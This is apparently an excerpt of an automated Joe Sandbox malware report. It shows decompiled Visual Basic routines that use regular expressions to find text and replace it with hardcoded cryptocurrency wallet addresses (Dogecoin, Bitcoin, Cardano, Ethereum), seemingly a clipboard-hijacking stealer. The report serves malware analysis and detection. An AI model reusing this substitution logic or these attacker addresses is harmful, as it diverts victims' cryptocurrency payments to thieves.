              • DPQBHQggTDv19PChkWXRcxMRPahhPVCa8L, xrefs: 00416E07
              • DAzXcVkaHGgYPpdz8irFB2PcvtoLP87bs5, xrefs: 00416E9F
              • DNnSUpUEk34iuf4fKipqGRrDdx4gtnBAxC, xrefs: 00416DD6
              • D8onfxEYEcRGNna4jEpRVXdYFdMFFtCmu3, xrefs: 00416C27
              • Pattern, xrefs: 00416AA3
              • DExYSfngpBw6yGPrPuL7TxTrDxvPMbnKFm, xrefs: 00416D12
              • Global, xrefs: 00416AED
              • DKnnMt7v5FJkjs38c6zdbR5s6LuoMvLcmq, xrefs: 00416D74
              • VBScript.RegExp, xrefs: 00416A37
              • Execute, xrefs: 00416B2F
              • DFp6KBk3do226tJbZ565k2R6iL29gHwyBg, xrefs: 00416D43
              • DSMKvqbsKgmBQECicFVsrEUyd3zHa5RSip, xrefs: 00416E38
              • DDvCUpZMkKJZA26HkwhqTTEKxbyUZ3h3Fb, xrefs: 00416CE1
              • DTbuVWrVPsUtj3C2eby86WRcybtD4GBtPA, xrefs: 00416E66
              Memory Dump Source
              • Source File: 00000000.00000002.699080451.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.699077488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.699098890.0000000000419000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.699104365.000000000041A000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Runtime Explorer.jbxd
              Yara matches
              Similarity
              • API ID: __vba$Free$LateMove$EachVarg$#617#712#716CallNextNofreeUnlock
              • String ID: D6sJqG8JFDH8kmoWNJyKRfYt4chwWEGnu9$D7FcMy6HGH5RdLcvB6TFXjT4m6BYN12uJo$D8onfxEYEcRGNna4jEpRVXdYFdMFFtCmu3$DAzXcVkaHGgYPpdz8irFB2PcvtoLP87bs5$DBH6uXwvHiepeRMCPDfWWpE63vVmCygE6c$DCVFpRb9XWZZuYD9f3PZwKUAL8Ho6ahagN$DDvCUpZMkKJZA26HkwhqTTEKxbyUZ3h3Fb$DExYSfngpBw6yGPrPuL7TxTrDxvPMbnKFm$DFp6KBk3do226tJbZ565k2R6iL29gHwyBg$DKnnMt7v5FJkjs38c6zdbR5s6LuoMvLcmq$DLYtRmHKE83Dppm7gT7yxgx7n8NsLQACGx$DNnSUpUEk34iuf4fKipqGRrDdx4gtnBAxC$DPQBHQggTDv19PChkWXRcxMRPahhPVCa8L$DSMKvqbsKgmBQECicFVsrEUyd3zHa5RSip$DTbuVWrVPsUtj3C2eby86WRcybtD4GBtPA$DUKBGpgmBJCCrQqS3b5VpDVKCK8xvxKb2h$Execute$Global$IgnoreCase$Pattern$VBScript.RegExp
              • API String ID: 3083996531-1940192035
              • Opcode ID: 3cea416903a9e41895a8d90d74ae57b65d2c9b94a58eb9f05c24e45c32734f65
              • Instruction ID: b6a0f0702147f5dfbe6ed0faf7a2fab26e30b85f1cb9588615b5d15cf349b7b8
              • Opcode Fuzzy Hash: 3cea416903a9e41895a8d90d74ae57b65d2c9b94a58eb9f05c24e45c32734f65
              • Instruction Fuzzy Hash: D0E14DB5800318AADF10EF96CD85EDEB7BCBF05314F60426BA419B31D1DB785A498F29
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              C-Code - Quality: 37%
              			E004166F9(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a4, void* _a8) {
              				intOrPtr _v8;
              				intOrPtr _v12;
              				char _v36;
              				char _v52;
              				char _v68;
              				char _v84;
              				char _v88;
              				char _v104;
              				signed int _v112;
              				char _v120;
              				signed int _v136;
              				char _v156;
              				char _v172;
              				char _v176;
              				char _v180;
              				char _v184;
              				char _v208;
              				char* _t93;
              				char* _t100;
              				char* _t101;
              				char* _t105;
              				char* _t107;
              				char* _t116;
              				char* _t118;
              				signed int _t145;
              				intOrPtr _t154;
              
              				_push(0x401256);
              				_push( *[fs:0x0]);
              				 *[fs:0x0] = _t154;
              				_v12 = _t154 - 0xbc;
              				_v8 = 0x401218;
              				_push(0);
              				_push(L"VBScript.RegExp");
              				_push( &_v104);
              				_v36 = 0;
              				_v52 = 0;
              				_v68 = 0;
              				_v84 = 0;
              				_v88 = 0;
              				_v104 = 0;
              				_v120 = 0;
              				_v136 = 0;
              				_v156 = 0;
              				_v172 = 0;
              				_v176 = 0;
              				_v180 = 0;
              				_v184 = 0;
              				L004012F2();
              				_push( &_v104);
              				_push( &_v52);
              				L004013EE();
              				L004013E2();
              				asm("movsd");
              				asm("movsd");
              				asm("movsd");
              				_push(L"Pattern");
              				_push( &_v52);
              				asm("movsd");
              				L004013E8();
              				_v112 = _v112 | 0xffffffff;
              				_v120 = 0xb;
              				asm("movsd");
              				asm("movsd");
              				asm("movsd");
              				_push(L"IgnoreCase");
              				_push( &_v52);
              				asm("movsd");
              				L004013E8();
              				_v112 = _v112 | 0xffffffff;
              				_v120 = 0xb;
              				asm("movsd");
              				asm("movsd");
              				asm("movsd");
              				_push(L"Global");
              				_push( &_v52);
              				asm("movsd");
              				L004013E8();
              				_v112 = 0;
              				_v120 = 2;
              				L004013DC();
              				_push( &_v208);
              				L004013D0();
              				asm("movsd");
              				asm("movsd");
              				asm("movsd");
              				asm("movsd");
              				_t145 = 1;
              				_push(_t145);
              				_push(L"Execute");
              				_push( &_v52);
              				_t93 =  &_v104;
              				_push(_t93);
              				L004013D6();
              				_push(_t93);
              				_push( &_v84);
              				L004013EE();
              				_push( &_v84);
              				_push( &_v68);
              				_push( &_v156);
              				_push( &_v180);
              				_push( &_v184);
              				_t100 =  &_v176;
              				_push(_t100);
              				L004013CA();
              				while(_t100 != 0) {
              					_push(2);
              					_push( &_v68);
              					_push( &_v104);
              					L004013A6();
              					L004013DC();
              					_v112 = 0x412650;
              					_push( &_v172);
              					_t105 =  &_v120;
              					_push(_t105);
              					_v120 = 0x8008;
              					L00401346();
              					if(_t105 != 0) {
              						L7:
              						_push(0);
              						_push(0xffffffff);
              						_push(_t145);
              						_push(L"qp0e0fdtxzgklu4um995qux0w5wep4mjwgcflz246z");
              					} else {
              						_v112 = 0x41265c;
              						_push( &_v172);
              						_t116 =  &_v120;
              						_push(_t116);
              						_v120 = 0x8008;
              						L00401346();
              						if(_t116 == 0) {
              							_v112 = 0x412668;
              							_push( &_v172);
              							_t118 =  &_v120;
              							_push(_t118);
              							_v120 = 0x8008;
              							L00401346();
              							if(_t118 == 0) {
              								goto L7;
              							} else {
              								_push(0);
              								_push(0xffffffff);
              								_push(_t145);
              								_push(L"qzatfelqp8ymsjchwwv57ckultvjsytwv5608qncdk");
              							}
              						} else {
              							_push(0);
              							_push(0xffffffff);
              							_push(_t145);
              							_push(L"qq75exaak2c70jxh3pjf7ll82x33a8gk0udetm5x6n");
              						}
              					}
              					_push( &_v68);
              					_t107 =  &_v88;
              					_push(_t107);
              					L0040139A();
              					_push(_t107);
              					_push( *0x419028);
              					L004013A0();
              					L0040136A();
              					L0040135E();
              					 *0x419024 =  *0x419024 | 0x0000ffff;
              					_push( &_v36);
              					_push( &_v120);
              					_push( &_v104);
              					_v112 = _t145;
              					_v120 = 2;
              					L004013C4();
              					L004013DC();
              					_push( &_v68);
              					_push( &_v156);
              					_push( &_v180);
              					_push( &_v184);
              					_t100 =  &_v176;
              					_push(_t100);
              					L004013BE();
              				}
              				_push(0x4169f5);
              				_t101 =  &_v176;
              				_push(_t101);
              				L004013AC();
              				L0040132E();
              				L00401352();
              				L00401352();
              				L00401352();
              				L00401352();
              				L00401352();
              				return _t101;
              			}

              APIs
              • #716.MSVBVM60(?,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 00416769
              • __vbaVarSetVar.MSVBVM60(?,?,?,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 00416776
              • __vbaVarVargNofree.MSVBVM60(?,?,?,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 00416784
              • __vbaVarLateMemSt.MSVBVM60(?,Pattern,00000000,00004008,00000008,00419028), ref: 0041679D
              • __vbaVarLateMemSt.MSVBVM60(?,IgnoreCase,?,?,?,?,?,?,00000008,00419028), ref: 004167C2
              • __vbaVarLateMemSt.MSVBVM60(?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 004167E7
              • __vbaVarMove.MSVBVM60(?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 004167FC
              • __vbaVargVar.MSVBVM60(?,?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 0041680B
              • __vbaVarLateMemCallLd.MSVBVM60(?,?,Execute,00000001), ref: 0041682C
              • __vbaVarSetVar.MSVBVM60(?,00000000), ref: 00416839
              • __vbaForEachVar.MSVBVM60(?,?,?,?,?,?,?,00000000), ref: 00416862
              • #617.MSVBVM60(?,?,00000002,?,?,?,?,?,?,?,00000000), ref: 0041687E
              • __vbaVarMove.MSVBVM60(?,?,00000002,?,?,?,?,?,?,?,00000000), ref: 0041688C
              • __vbaVarTstEq.MSVBVM60(00000002,?,?,?,00000002,?,?,?,?,?,?,?,00000000), ref: 004168AA
              • __vbaVarTstEq.MSVBVM60(00008008,?,00000002,?,?,?,00000002,?,?,?,?,?,?,00008008,?,00000000), ref: 004168CD
              • __vbaVarTstEq.MSVBVM60(00008008,?,00008008,?,00000002,?,?,?,00000002,?,?,?,?,?,?,00008008), ref: 004168FB
              • __vbaStrVarVal.MSVBVM60(?,?,qp0e0fdtxzgklu4um995qux0w5wep4mjwgcflz246z,00000001,000000FF,00000000,00000002,?,?,?,00000002,?,?,?,?,?), ref: 00416921
              • #712.MSVBVM60(00000000,?,?,qp0e0fdtxzgklu4um995qux0w5wep4mjwgcflz246z,00000001,000000FF,00000000,00000002,?,?,?,00000002,?,?,?,?), ref: 0041692D
              • __vbaStrMove.MSVBVM60(00000000,?,?,qp0e0fdtxzgklu4um995qux0w5wep4mjwgcflz246z,00000001,000000FF,00000000,00000002,?,?,?,00000002,?,?,?,?), ref: 00416936
              • __vbaFreeStr.MSVBVM60(00000000,?,?,qp0e0fdtxzgklu4um995qux0w5wep4mjwgcflz246z,00000001,000000FF,00000000,00000002,?,?,?,00000002,?,?,?,?), ref: 0041693E
              • __vbaVarAdd.MSVBVM60(?,00008008,?,00000000,?,?,qp0e0fdtxzgklu4um995qux0w5wep4mjwgcflz246z,00000001,000000FF,00000000,00000002,?,?,?,00000002,?), ref: 00416961
              • __vbaVarMove.MSVBVM60(?,00008008,?,00000000,?,?,qp0e0fdtxzgklu4um995qux0w5wep4mjwgcflz246z,00000001,000000FF,00000000,00000002,?,?,?,00000002,?), ref: 0041696B
              • __vbaNextEachVar.MSVBVM60(?,?,?,?,?,?,00008008,?,00000000,?,?,qp0e0fdtxzgklu4um995qux0w5wep4mjwgcflz246z,00000001,000000FF,00000000,00000002), ref: 00416990
              • __vbaAryUnlock.MSVBVM60(?,004169F5,?,?,?,?,?,?,?,00000000), ref: 004169B9
              • __vbaFreeObj.MSVBVM60(?,004169F5,?,?,?,?,?,?,?,00000000), ref: 004169C4
              • __vbaFreeVar.MSVBVM60(?,004169F5,?,?,?,?,?,?,?,00000000), ref: 004169CF
              • __vbaFreeVar.MSVBVM60(?,004169F5,?,?,?,?,?,?,?,00000000), ref: 004169D7
              • __vbaFreeVar.MSVBVM60(?,004169F5,?,?,?,?,?,?,?,00000000), ref: 004169DF
              • __vbaFreeVar.MSVBVM60(?,004169F5,?,?,?,?,?,?,?,00000000), ref: 004169E7
              • __vbaFreeVar.MSVBVM60(?,004169F5,?,?,?,?,?,?,?,00000000), ref: 004169EF
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.699080451.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.699077488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.699098890.0000000000419000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.699104365.000000000041A000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Runtime Explorer.jbxd
              Yara matches
              Similarity
              • API ID: __vba$Free$LateMove$EachVarg$#617#712#716CallNextNofreeUnlock
              • String ID: Execute$Global$IgnoreCase$Pattern$VBScript.RegExp$qp0e0fdtxzgklu4um995qux0w5wep4mjwgcflz246z$qq75exaak2c70jxh3pjf7ll82x33a8gk0udetm5x6n$qzatfelqp8ymsjchwwv57ckultvjsytwv5608qncdk
              • API String ID: 3083996531-1106001032
              • Opcode ID: 8dbdfaf1e005c241f7213055b92d1c62d08d538fbbbd43146cdfe124474290e2
              • Instruction ID: 7ce5d415431a14433d6b44caf41925242031a9b194db50f7bcad967bc9c8ff0c
              • Opcode Fuzzy Hash: 8dbdfaf1e005c241f7213055b92d1c62d08d538fbbbd43146cdfe124474290e2
              • Instruction Fuzzy Hash: 68812DB1D00218AADB10EFE6CD81EDEB7BCBB09304F60427FA509B7191DB785A498F55
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              C-Code - Quality: 37%
              			E00416178(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a4, void* _a8) {
              				intOrPtr _v8;
              				intOrPtr _v12;
              				char _v36;
              				char _v52;
              				char _v68;
              				char _v84;
              				char _v88;
              				char _v104;
              				signed int _v120;
              				signed int _v128;
              				char _v136;
              				signed int _v152;
              				intOrPtr _v172;
              				char _v176;
              				char _v180;
              				char _v184;
              				char _v188;
              				char _v212;
              				char* _t85;
              				char* _t92;
              				char* _t93;
              				char* _t97;
              				char* _t99;
              				char* _t131;
              				intOrPtr _t140;
              
              				_push(0x401256);
              				_push( *[fs:0x0]);
              				 *[fs:0x0] = _t140;
              				_v12 = _t140 - 0xc0;
              				_v8 = 0x4011f8;
              				_push(0);
              				_push(L"VBScript.RegExp");
              				_push( &_v104);
              				_v36 = 0;
              				_v52 = 0;
              				_v68 = 0;
              				_v84 = 0;
              				_v88 = 0;
              				_v104 = 0;
              				_v120 = 0;
              				_v136 = 0;
              				_v152 = 0;
              				_v176 = 0;
              				_v180 = 0;
              				_v184 = 0;
              				_v188 = 0;
              				L004012F2();
              				_push( &_v104);
              				_push( &_v52);
              				L004013EE();
              				L004013E2();
              				asm("movsd");
              				asm("movsd");
              				asm("movsd");
              				_push(L"Pattern");
              				_push( &_v52);
              				asm("movsd");
              				L004013E8();
              				_v128 = _v128 | 0xffffffff;
              				_v136 = 0xb;
              				asm("movsd");
              				asm("movsd");
              				asm("movsd");
              				_push(L"IgnoreCase");
              				_push( &_v52);
              				asm("movsd");
              				L004013E8();
              				_v128 = _v128 | 0xffffffff;
              				_v136 = 0xb;
              				asm("movsd");
              				asm("movsd");
              				asm("movsd");
              				_push(L"Global");
              				_push( &_v52);
              				asm("movsd");
              				L004013E8();
              				_v128 = 0;
              				_v136 = 2;
              				L004013DC();
              				_push( &_v212);
              				L004013D0();
              				asm("movsd");
              				asm("movsd");
              				asm("movsd");
              				asm("movsd");
              				_t131 = 1;
              				_push(_t131);
              				_push(L"Execute");
              				_push( &_v52);
              				_t85 =  &_v104;
              				_push(_t85);
              				L004013D6();
              				_push(_t85);
              				_push( &_v84);
              				L004013EE();
              				_push( &_v84);
              				_push( &_v68);
              				_push( &_v176);
              				_push( &_v184);
              				_push( &_v188);
              				_t92 =  &_v180;
              				_push(_t92);
              				L004013CA();
              				while(_t92 != 0) {
              					_push(5);
              					_push( &_v68);
              					_push( &_v104);
              					L004013A6();
              					_v128 = L"DdzFF";
              					_push( &_v104);
              					_t97 =  &_v136;
              					_push(_t97);
              					_v136 = 0x8008;
              					L00401346();
              					_v172 = _t97;
              					L00401352();
              					_push(0);
              					_push(0xffffffff);
              					_push(_t131);
              					if(_v172 == 0) {
              						_push(L"addr1vyh3ysu2rl4q2llq80sptvk3hftr8xen8dc73kdc3ezlqngpqtaye");
              					} else {
              						_push(L"DdzFFzCqrht7BN8PewS7jjUnzZtFEfwaP54K5qPmq9yGbZ59JuJgpTrCSRdCdZULEAo5vRVPXLstBpsFXDpHVD8peY9ESdd77GFzsF6D");
              					}
              					_push( &_v68);
              					_t57 =  &_v88; // 0x41745b
              					_t99 = _t57;
              					_push(_t99);
              					L0040139A();
              					_push(_t99);
              					_push( *0x419028);
              					L004013A0();
              					L0040136A();
              					L0040135E();
              					_v128 = _t131;
              					_push( &_v36);
              					_push( &_v136);
              					_push( &_v104);
              					_v136 = 2;
              					L004013C4();
              					L004013DC();
              					_push( &_v68);
              					_push( &_v176);
              					_push( &_v184);
              					_push( &_v188);
              					_t92 =  &_v180;
              					_push(_t92);
              					L004013BE();
              				}
              				_push(0x416435);
              				_t93 =  &_v180;
              				_push(_t93);
              				L004013AC();
              				L0040132E();
              				L00401352();
              				L00401352();
              				L00401352();
              				L00401352();
              				return _t93;
              			}

              APIs
              • #716.MSVBVM60(00401256,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 004161E8
              • __vbaVarSetVar.MSVBVM60(?,00401256,00401256,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 004161F5
              • __vbaVarVargNofree.MSVBVM60(?,00401256,00401256,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 00416203
              • __vbaVarLateMemSt.MSVBVM60(?,Pattern,00000000,00004008,00000008,00419028), ref: 0041621C
              • __vbaVarLateMemSt.MSVBVM60(?,IgnoreCase,?,?,?,?,?,?,00000008,00419028), ref: 00416247
              • __vbaVarLateMemSt.MSVBVM60(?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 00416272
              • __vbaVarMove.MSVBVM60(?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 0041628D
              • __vbaVargVar.MSVBVM60(?,?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 0041629C
              • __vbaVarLateMemCallLd.MSVBVM60(00401256,?,Execute,00000001), ref: 004162BD
              • __vbaVarSetVar.MSVBVM60(?,00000000), ref: 004162CA
              • __vbaForEachVar.MSVBVM60(?,?,?,?,?,?,?,00000000), ref: 004162F3
              • #617.MSVBVM60(00401256,?,00000005,?,?,?,?,?,?,?,00000000), ref: 0041630F
              • __vbaVarTstEq.MSVBVM60(00000002,00401256,00401256,?,00000005,?,?,?,?,?,?,?,00000000), ref: 00416330
              • __vbaFreeVar.MSVBVM60(00000002,00401256,00401256,?,00000005,?,?,?,?,?,?,?,00000000), ref: 0041633E
              • __vbaStrVarVal.MSVBVM60([tA,?,addr1vyh3ysu2rl4q2llq80sptvk3hftr8xen8dc73kdc3ezlqngpqtaye,00000001,000000FF,00000000,00000002,00401256,00401256,?,00000005,?,?,?,?,?), ref: 00416364
              • #712.MSVBVM60(00000000,[tA,?,addr1vyh3ysu2rl4q2llq80sptvk3hftr8xen8dc73kdc3ezlqngpqtaye,00000001,000000FF,00000000,00000002,00401256,00401256,?,00000005,?,?,?,?), ref: 00416370
              • __vbaStrMove.MSVBVM60(00000000,[tA,?,addr1vyh3ysu2rl4q2llq80sptvk3hftr8xen8dc73kdc3ezlqngpqtaye,00000001,000000FF,00000000,00000002,00401256,00401256,?,00000005,?,?,?,?), ref: 00416379
              • __vbaFreeStr.MSVBVM60(00000000,[tA,?,addr1vyh3ysu2rl4q2llq80sptvk3hftr8xen8dc73kdc3ezlqngpqtaye,00000001,000000FF,00000000,00000002,00401256,00401256,?,00000005,?,?,?,?), ref: 00416381
              • __vbaVarAdd.MSVBVM60(00401256,00008008,?,00000000,[tA,?,addr1vyh3ysu2rl4q2llq80sptvk3hftr8xen8dc73kdc3ezlqngpqtaye,00000001,000000FF,00000000,00000002,00401256,00401256,?,00000005,?), ref: 004163A2
              • __vbaVarMove.MSVBVM60(00401256,00008008,?,00000000,[tA,?,addr1vyh3ysu2rl4q2llq80sptvk3hftr8xen8dc73kdc3ezlqngpqtaye,00000001,000000FF,00000000,00000002,00401256,00401256,?,00000005,?), ref: 004163AC
              • __vbaNextEachVar.MSVBVM60(?,?,?,?,?,00401256,00008008,?,00000000,[tA,?,addr1vyh3ysu2rl4q2llq80sptvk3hftr8xen8dc73kdc3ezlqngpqtaye,00000001,000000FF,00000000,00000002), ref: 004163D1
              • __vbaAryUnlock.MSVBVM60(?,00416435,?,?,?,?,?,?,?,00000000), ref: 00416404
              • __vbaFreeObj.MSVBVM60(?,00416435,?,?,?,?,?,?,?,00000000), ref: 0041640F
              • __vbaFreeVar.MSVBVM60(?,00416435,?,?,?,?,?,?,?,00000000), ref: 00416417
              • __vbaFreeVar.MSVBVM60(?,00416435,?,?,?,?,?,?,?,00000000), ref: 0041641F
              • __vbaFreeVar.MSVBVM60(?,00416435,?,?,?,?,?,?,?,00000000), ref: 00416427
              • __vbaFreeVar.MSVBVM60(?,00416435,?,?,?,?,?,?,?,00000000), ref: 0041642F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.699080451.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.699077488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.699098890.0000000000419000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.699104365.000000000041A000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Runtime Explorer.jbxd
              Yara matches
              Similarity
              • API ID: __vba$Free$Late$Move$EachVarg$#617#712#716CallNextNofreeUnlock
              • String ID: DdzFF$DdzFFzCqrht7BN8PewS7jjUnzZtFEfwaP54K5qPmq9yGbZ59JuJgpTrCSRdCdZULEAo5vRVPXLstBpsFXDpHVD8peY9ESdd77GFzsF6D$Execute$Global$IgnoreCase$Pattern$VBScript.RegExp$[tA$addr1vyh3ysu2rl4q2llq80sptvk3hftr8xen8dc73kdc3ezlqngpqtaye
              • API String ID: 3165666924-2065352155
              • Opcode ID: 94c56d6ff753b53e10e8f38fd84770a58fd3655326989be4f30b0ee166e7d6e3
              • Instruction ID: 94245eaa7c88157d15205a62f51e8447db82719ee69417a6f39068eb3cb7788f
              • Opcode Fuzzy Hash: 94c56d6ff753b53e10e8f38fd84770a58fd3655326989be4f30b0ee166e7d6e3
              • Instruction Fuzzy Hash: 3B7107B2C0021CAADB10EFA5CD81FDEB7BDBB08304F5041ABA909F7591DB785A498F55
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              C-Code - Quality: 36%
              			E00416446(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a4, void* _a8) {
              				intOrPtr _v8;
              				intOrPtr _v12;
              				char _v36;
              				char _v52;
              				char _v68;
              				char _v84;
              				char _v88;
              				char _v104;
              				signed int _v112;
              				char _v120;
              				signed int _v136;
              				char _v156;
              				char _v172;
              				char _v176;
              				char _v180;
              				char _v184;
              				char _v208;
              				char* _t85;
              				char* _t92;
              				char* _t93;
              				char* _t99;
              				char* _t133;
              				intOrPtr _t142;
              
              				_push(0x401256);
              				_push( *[fs:0x0]);
              				 *[fs:0x0] = _t142;
              				_v12 = _t142 - 0xbc;
              				_v8 = 0x401208;
              				_push(0);
              				_push(L"VBScript.RegExp");
              				_push( &_v104);
              				_v36 = 0;
              				_v52 = 0;
              				_v68 = 0;
              				_v84 = 0;
              				_v88 = 0;
              				_v104 = 0;
              				_v120 = 0;
              				_v136 = 0;
              				_v156 = 0;
              				_v172 = 0;
              				_v176 = 0;
              				_v180 = 0;
              				_v184 = 0;
              				L004012F2();
              				_push( &_v104);
              				_push( &_v52);
              				L004013EE();
              				L004013E2();
              				asm("movsd");
              				asm("movsd");
              				asm("movsd");
              				_push(L"Pattern");
              				_push( &_v52);
              				asm("movsd");
              				L004013E8();
              				_v112 = _v112 | 0xffffffff;
              				_v120 = 0xb;
              				asm("movsd");
              				asm("movsd");
              				asm("movsd");
              				_push(L"IgnoreCase");
              				_push( &_v52);
              				asm("movsd");
              				L004013E8();
              				_v112 = _v112 | 0xffffffff;
              				_v120 = 0xb;
              				asm("movsd");
              				asm("movsd");
              				asm("movsd");
              				_push(L"Global");
              				_push( &_v52);
              				asm("movsd");
              				L004013E8();
              				_v112 = 0;
              				_v120 = 2;
              				L004013DC();
              				_push( &_v208);
              				L004013D0();
              				asm("movsd");
              				asm("movsd");
              				_push(1);
              				asm("movsd");
              				_push(L"Execute");
              				_push( &_v52);
              				_t85 =  &_v104;
              				_push(_t85);
              				asm("movsd");
              				L004013D6();
              				_push(_t85);
              				_push( &_v84);
              				L004013EE();
              				_push( &_v84);
              				_push( &_v68);
              				_push( &_v156);
              				_push( &_v180);
              				_push( &_v184);
              				_t92 =  &_v176;
              				_push(_t92);
              				L004013CA();
              				_t133 = L"0xC4eABEc8CCb1db4db76A2CA716B03D0ae7b8d929";
              				while(_t92 != 0) {
              					_push(3);
              					_push( &_v68);
              					_push( &_v104);
              					L004013A6();
              					L004013DC();
              					_v112 = 0x412644;
              					_push( &_v172);
              					_push( &_v120);
              					_v120 = 0x8008;
              					L00401346();
              					_push(0);
              					_push(0xffffffff);
              					_push(1);
              					_push(_t133);
              					_push( &_v68);
              					_t99 =  &_v88;
              					_push(_t99);
              					L0040139A();
              					_push(_t99);
              					_push( *0x419028);
              					L004013A0();
              					L0040136A();
              					L0040135E();
              					 *0x419024 =  *0x419024 | 0x0000ffff;
              					_push( &_v36);
              					_push( &_v120);
              					_push( &_v104);
              					_v112 = 1;
              					_v120 = 2;
              					L004013C4();
              					L004013DC();
              					_push( &_v68);
              					_push( &_v156);
              					_push( &_v180);
              					_push( &_v184);
              					_t92 =  &_v176;
              					_push(_t92);
              					L004013BE();
              				}
              				_push(0x4166e8);
              				_t93 =  &_v176;
              				_push(_t93);
              				L004013AC();
              				L0040132E();
              				L00401352();
              				L00401352();
              				L00401352();
              				L00401352();
              				L00401352();
              				return _t93;
              			}


              APIs
              • #716.MSVBVM60(?,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 004164B6
              • __vbaVarSetVar.MSVBVM60(?,?,?,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 004164C3
              • __vbaVarVargNofree.MSVBVM60(?,?,?,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 004164D1
              • __vbaVarLateMemSt.MSVBVM60(?,Pattern,00000000,00004008,00000008,00419028), ref: 004164EA
              • __vbaVarLateMemSt.MSVBVM60(?,IgnoreCase,?,?,?,?,?,?,00000008,00419028), ref: 0041650F
              • __vbaVarLateMemSt.MSVBVM60(?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 00416534
              • __vbaVarMove.MSVBVM60(?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 00416549
              • __vbaVargVar.MSVBVM60(?,?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 00416558
              • __vbaVarLateMemCallLd.MSVBVM60(?,?,Execute,00000001), ref: 00416577
              • __vbaVarSetVar.MSVBVM60(?,00000000), ref: 00416584
              • __vbaForEachVar.MSVBVM60(?,?,?,?,?,?,?,00000000), ref: 004165AD
              • #617.MSVBVM60(?,?,00000003,?,?,?,?,?,?,?,00000000), ref: 004165CE
              • __vbaVarMove.MSVBVM60(?,?,00000003,?,?,?,?,?,?,?,00000000), ref: 004165DC
              • __vbaVarTstEq.MSVBVM60(00000002,?,?,?,00000003,?,?,?,?,?,?,?,00000000), ref: 004165FA
              • __vbaStrVarVal.MSVBVM60(?,?,0xC4eABEc8CCb1db4db76A2CA716B03D0ae7b8d929,00000001,000000FF,00000000,00000002,?,?,?,00000003,?,?,?,?,?), ref: 00416610
              • #712.MSVBVM60(00000000,?,?,0xC4eABEc8CCb1db4db76A2CA716B03D0ae7b8d929,00000001,000000FF,00000000,00000002,?,?,?,00000003,?,?,?,?), ref: 0041661C
              • __vbaStrMove.MSVBVM60(00000000,?,?,0xC4eABEc8CCb1db4db76A2CA716B03D0ae7b8d929,00000001,000000FF,00000000,00000002,?,?,?,00000003,?,?,?,?), ref: 00416625
              • __vbaFreeStr.MSVBVM60(00000000,?,?,0xC4eABEc8CCb1db4db76A2CA716B03D0ae7b8d929,00000001,000000FF,00000000,00000002,?,?,?,00000003,?,?,?,?), ref: 0041662D
              • __vbaVarAdd.MSVBVM60(?,00008008,?,00000000,?,?,0xC4eABEc8CCb1db4db76A2CA716B03D0ae7b8d929,00000001,000000FF,00000000,00000002,?,?,?,00000003,?), ref: 00416654
              • __vbaVarMove.MSVBVM60(?,00008008,?,00000000,?,?,0xC4eABEc8CCb1db4db76A2CA716B03D0ae7b8d929,00000001,000000FF,00000000,00000002,?,?,?,00000003,?), ref: 0041665E
              • __vbaNextEachVar.MSVBVM60(?,?,?,?,?,?,00008008,?,00000000,?,?,0xC4eABEc8CCb1db4db76A2CA716B03D0ae7b8d929,00000001,000000FF,00000000,00000002), ref: 00416683
              • __vbaAryUnlock.MSVBVM60(?,004166E8,?,?,?,?,?,?,?,00000000), ref: 004166AC
              • __vbaFreeObj.MSVBVM60(?,004166E8,?,?,?,?,?,?,?,00000000), ref: 004166B7
              • __vbaFreeVar.MSVBVM60(?,004166E8,?,?,?,?,?,?,?,00000000), ref: 004166C2
              • __vbaFreeVar.MSVBVM60(?,004166E8,?,?,?,?,?,?,?,00000000), ref: 004166CA
              • __vbaFreeVar.MSVBVM60(?,004166E8,?,?,?,?,?,?,?,00000000), ref: 004166D2
              • __vbaFreeVar.MSVBVM60(?,004166E8,?,?,?,?,?,?,?,00000000), ref: 004166DA
              • __vbaFreeVar.MSVBVM60(?,004166E8,?,?,?,?,?,?,?,00000000), ref: 004166E2
              Strings
              Memory Dump Source
